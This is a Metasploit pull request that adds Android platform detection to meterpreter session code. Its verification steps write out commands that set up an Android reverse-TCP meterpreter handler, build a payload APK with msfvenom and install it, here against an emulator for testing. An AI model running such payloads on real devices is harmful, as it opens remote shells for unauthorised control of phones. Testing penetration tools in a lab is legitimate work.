### PR TITLE
fix android autoload commands and sysinfo

### DIFF
--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -347,6 +347,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client
           Msf::Module::Platform::OpenBSD
         when /sunos/i
           Msf::Module::Platform::Solaris
+        when /android/i
+          Msf::Module::Platform::Android
         else
           Msf::Module::Platform::Linux
       end.realname.downcase


### PR DESCRIPTION
Quick fix for https://github.com/rapid7/metasploit-framework/issues/7226

It looks like android was missing from lib/msf/base/sessions/meterpreter.rb, so on an Android meterpreter session sysinfo is incorrectly showing java/java and platform is java.
This PR should fix that.
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] Get an Android meterpreter session:

```
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
...
./msfvenom -p android/meterpreter/reverse_tcp -f raw LHOST=10.0.3.2 LPORT=4444 > android.apk
./tools/exploit/install_msf_apk.sh android.apk
```
- [ ] **Verify** That sysinfo looks sensible:

```
meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.4.4 - Linux 3.10.0-genymotion-g1d178ae-dirty (i686)
Meterpreter : java/android
```
- [x] **Verify** the android commands are automatically loaded
